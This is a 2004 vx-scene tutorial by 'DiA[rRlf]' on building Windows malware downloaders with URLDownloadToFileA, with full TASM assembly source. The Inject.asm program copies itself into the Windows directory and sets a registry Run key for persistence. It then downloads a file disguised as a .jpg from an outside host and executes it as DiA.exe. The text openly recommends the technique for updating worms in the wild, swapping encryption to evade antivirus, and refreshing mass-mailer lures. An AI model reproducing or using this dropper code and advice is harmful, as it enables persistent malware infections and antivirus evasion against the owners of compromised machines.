Up to Date with the URLDownloadToFileA API [by DiA]
Up to Date with the URLDownloadToFileA API
by DiA[rRlf] (c)04
www.vx-dia.de.vu - DiA@rrlf.de
__________________________________________
:disclaimer
I am NOT responsible for any damage that you do! If you use this code, you (and only you)
are responsible for executable files. Have fun with this...
:index_______________________
| 1. Intro |
| 2. The API |
| 3. Short Example |
| 4. Usage Examples, theorie |
| 5. Injection Example |
| 6. Outjection Example |
| 7. Outro |
|____________________________|
:1. Intro
Hello again, today I want to show you a method to download a file from the internet (http)
to the local machine. It's very easy with the URLDownloadToFileA API, but this API is not
much commented. So I resulute to write this tutorial. I hope with this codes you are Up to
Date =). Have fun...
:2. The API
First of all I must say that I test this only on Windows98SE OS! But I think on other Win
OS's it works too.
The API stores in a DLL stored in Windows\System directory. On my machine it is in
C:\Windows\System\urlmon.dll . Urlmon is the name of the DLL. We only must load this library
to handle with the URLDownloadToFileA API. Look at the Short Example to see how to handle
with .dll's. Now I want to give you a short overview to the URLDownloadToFileA API:
push 0 ;lpfnCB -> No idea ;) not interessting, simple push a 0
push 0 ;dwReserved -> every time push a 0
push offset szFileName ;full path of local file eG "C:\DownloadedFile.exe"
push offset szURL ;full URL of file to download eG "http://server.cz/DownloadThis.exe
push 0 ;pCaller -> simply push a 0
call URLDownloadToFileA ;call the api, get it from DLL
Ok, now I show you how to handle with a DLL file, and get a API call, and the how to
download a file from a URL to local machine. Let's do this...
:3. Short Example
;-----cut-----URLtoFILE.asm-----------------------------------------------------------------
; compiling:
; TASM32 /z /ml /m3 URLtoFILE,,;
; TLINK32 -Tpe -c -aa URLtoFILE,URLtoFILE,, import32.lib
.386
.model flat
jumps
extrn LoadLibraryA :PROC ;to handle with the urlmon.dll
extrn GetProcAddress :PROC ;to find the API in this DLL
extrn ExitProcess :PROC ;to quit program
extrn MessageBoxA :PROC ;to show a short information
.data
szDLL db 'C:\Windows\System\urlmon.dll',0 ;full path to the urlmon DLL
szAPI db 'URLDownloadToFileA',0 ;name of API to find
szURL db 'http://home.arcor.de/vx-dia/news.html',0 ;the complete url, with
;extension of file!
szFileName db 'C:\DiA_news.html',0 ;complete path, the program download now to this
;path on local machine
oMsg db 'File download complete!',10,13 ;only a information msg
db 'The file is now in C:\DiA_news.html',10,13
db '...downloaded from http://home.arcor.de/vx-dia/news.html',10,13
db 'with the API URLDownloadToFileA from the URLmon DLL',0
.code
start:
push offset szDLL ;get DLL to handle with it
call LoadLibraryA ;handle is now in eax
push offset szAPI ;search this API address
push eax ;handle of urlmon.dll
call GetProcAddress ;address now in eax
push 0 ;see "The API"
push 0
push offset szFileName ;full path of file (local)
push offset szURL ;full URL of file (http)
push 0
call eax ;call URLDownloadToFileA
push 0 ;Information message
push offset szAPI
push offset oMsg
push 0
call MessageBoxA
push 0
call ExitProcess ;quit program
end start
;-----cut-----URLtoFILE.asm-----------------------------------------------------------------
:4. Usage Examples, theorie
You can do a lot of things, and the greatest is that you can everytime upload a other
executable file to your (or other) server. Here are some Usage Examples, I think that would
be kewl:
- Update your malware
You found a bug in your code, but your shitty malware is in the wild?! No problemo,
simply write a update program, that fix or overwrites your buggy code. If your update
program has a bug too...who cares, write a new one, and upload it.
- New Encryption
AV's detected your encrypted virus? Write a new engine and update it. AV's wouldn't
detect this new encryption method.
- New Spreading Technics
You have write a kewl worm, but it stuck on spreading? Write new Spreading methods, and
Update this Worm. Maybe new E-Mail Spreading, or new way's to generate/found Mail
addresses.
- New Strings
You do a P2P, MassMailer ... and all knows your fake names? Write new Names, Subjects,
Bodys or Attachments and update your Worm.
- Desinfect the Sytem
Microsoft, CIA, FBI, LKA and Police is hunting you, bacauze your creation is spreading as
Hell? Write a desinfect program for your Virus/Worm, upload it and the Virus/Worm will
remove itself. This Method I show in the next two parts.
:5. Injection Example
;-----cut-----Inject.asm--------------------------------------------------------------------
; compiling:
; TASM32 /z /ml /m3 Inject,,;
; TLINK32 -Tpe -c -aa Inject,Inject,, import32.lib
.386
.model flat
jumps
extrn GetCommandLineA :PROC
extrn lstrcpyA :PROC
extrn GetWindowsDirectoryA :PROC
extrn lstrcatA :PROC
extrn CopyFileA :PROC
extrn RegOpenKeyExA :PROC
extrn RegSetValueExA :PROC
extrn RegCloseKey :PROC
extrn LoadLibraryA :PROC
extrn GetProcAddress :PROC
extrn CreateProcessA :PROC
extrn ExitProcess :PROC
.data
ThisFile db 260d dup (0) ;save the commandline
WindowsDir db 260d dup (?) ;save here the windows path
InjectFile db '\Inject.exe',0 ;after join this 2 strings:
; C:\Windows\Inject.exe
StartupKey db 'Software\Microsoft\Windows\CurrentVersion\Run',0 ;to start
;Inject.exe every System start
StartupName db 'URLtoFILE_Inject',0 ;value name
;value is "C:\Windows\Inject.exe
RegHandle dd 0 ;to handle with the registry
URLDownloadToFileA dd ? ;save here address of function
InjectDLL db '\System\urlmon.dll',0 ;join with windows directory
InjectFunction db 'URLDownloadToFileA',0 ;search for this function in the dll
InjectURL db 'http://home.arcor.de/vx-dia/DiA.jpg',0 ;load this file from the i-net
InjectSaveAs db '\DiA.exe',0 ;save (rename) as DiA.exe in the
;Windows directory
Crap dd 4 dup (?) ;only for CreateProcess
.code
Inject:
call GetCommandLineA ;looks like "C:\Argh.exe" with "
inc eax ;remove first "
push eax ;copy commandline to
push offset ThisFile ;a string
call lstrcpyA
mov esi, offset ThisFile ;call GetPoint function t
call GetPoint ;remove last "
mov dword ptr [esi+4],0 ;erase
push 260d ;size
push offset WindowsDir ;save there
call GetWindowsDirectoryA
push offset InjectFile ;join WindowsDir + Filename
push offset WindowsDir ; C:\Windows\Inject.exe
call lstrcatA ;the API to join 2 strings
push 0 ;copy ever
push offset WindowsDir ;copy this file to
push offset ThisFile ;the windows directory
call CopyFileA ;copy it
push offset RegHandle ;save there the handle
push 001F0000h ;read and write to registry
push 0
push offset StartupKey ;Run
push 80000002h ;HKEY_LOCAL_MACHINE
call RegOpenKeyExA ;open key
push 260d ;size
push offset WindowsDir ; C:\Windows\Inject.exe
push 1 ;string
push 0
push offset StartupName ;value name
push dword ptr [RegHandle] ;saved handle
call RegSetValueExA
push dword ptr [RegHandle]
call RegCloseKey ;close handle
push 260d ;size
push offset WindowsDir ;save there
call GetWindowsDirectoryA
push offset InjectDLL ;join WindowsDir + DLL Filename
push offset WindowsDir ; C:\Windows\System\urlmon.dll
call lstrcatA
push offset WindowsDir ;load library
call LoadLibraryA ;to get API
push offset InjectFunction ;function to search
push eax ;library handle
call GetProcAddress ;now in eax
mov URLDownloadToFileA, eax ;save address of function
push 260d ;size
push offset WindowsDir ;save there
call GetWindowsDirectoryA
push offset InjectSaveAs ;join WindowsDir + downloaded code
push offset WindowsDir ; C:\Windows\DiA.exe
call lstrcatA
push 0
push 0
push offset WindowsDir ;save local as "DiA.exe"
push offset InjectURL ;get file from this address
push 0
call URLDownloadToFileA ;call URLDownloadToFileA
push offset Crap ;execute downloaded file
push offset Crap
push 0
push 0
push 10h ;create new process
push 0
push 0
push 0
push offset WindowsDir ;first downloaded...
push offset WindowsDir ;...and then executed - DiA.exe
call CreateProcessA
push 0
call ExitProcess ;the end
GetPoint: ;the good old procedure
cmp byte ptr [esi],'.' ;is byte a '.'
jz FoundPoint ;if yes, return
inc esi ;if not, inc esi
jmp GetPoint ;search again
FoundPoint: ;label
ret ;return
end Inject
;-----cut-----Inject.asm--------------------------------------------------------------------
:6. Outjection Example
;-----cut-----Outject.asm-------------------------------------------------------------------
; compiling:
; TASM32 /z /ml /m3 Inject,,;
; TLINK32 -Tpe -c -aa Inject,Inject,, import32.lib
.386
.model flat
jumps
extrn RegOpenKeyExA :PROC
extrn RegDeleteValueA :PROC
extrn RegCloseKey :PROC
extrn GetWindowsDirectoryA :PROC
extrn SetCurrentDirectoryA :PROC
extrn DeleteFileA :PROC
extrn MessageBoxA :PROC
extrn ExitProcess :PROC
.data
StartupKey db 'Software\Microsoft\Windows\CurrentVersion\Run',0
StartupName db 'URLtoFILE_Inject',0 ;delete this value
RegHandle dd 0 ;handle of registry key
WindowsDir db 260d dup (?) ;save here windows directory
DiAFile db 'DiA.exe',0 ;to delete this file
InjectFile db 'Inject.exe',0 ;delete this too
oTitle db 'System is now clean',0
oMsg db '- Registry Startup Value deleted',10,13
db '- Inject.exe deleted',10,13
db '- DiA.exe (this file) deleted',10,13,10,13
db 'by DiA[rRlf] (c)04 GermanY - www.vx-dia.de.vu',0
.code
Outject:
push 0
push offset oTitle
push offset oMsg
push 0
call MessageBoxA
push offset RegHandle ;save here the handle
push 001F0000h ;read and write
push 0
push offset StartupKey ;Run
push 80000002h ;HKEY_LOCAL_MACHINE
call RegOpenKeyExA ;open key
push offset StartupName ;delete this
push dword ptr [RegHandle] ;get handle
call RegDeleteValueA
push dword ptr [RegHandle]
call RegCloseKey ;close this handle
push 260d ;size
push offset WindowsDir ;save there
call GetWindowsDirectoryA
push offset WindowsDir ;eG C:\Windows
call SetCurrentDirectoryA ;cd
push offset InjectFile
call DeleteFileA ;delete Inject.exe
push offset DiAFile ;delete DiA.exe
call DeleteFileA
push 0
call ExitProcess ;exit
end Outject
;-----cut-----Outject.asm-------------------------------------------------------------------
:7. Outro
With this API it's in your hand what your malware does! You have the full control (pseudo
remote control ;) - prc =)) for it. You can update it to the perfection of it self, and if
your creation is too hot, and infect's all but you don't want that, simple write a small
desinfection application. I hope you learned from this tutorial, and if you has comments,
bugs, greetz, fucks.. please mail to DiA@rrlf.de
OK ppl, we see us in the next tutorial, have a lot of fun-time, don't drink too much ;)
bye, DiA[rRlf]
07.06.04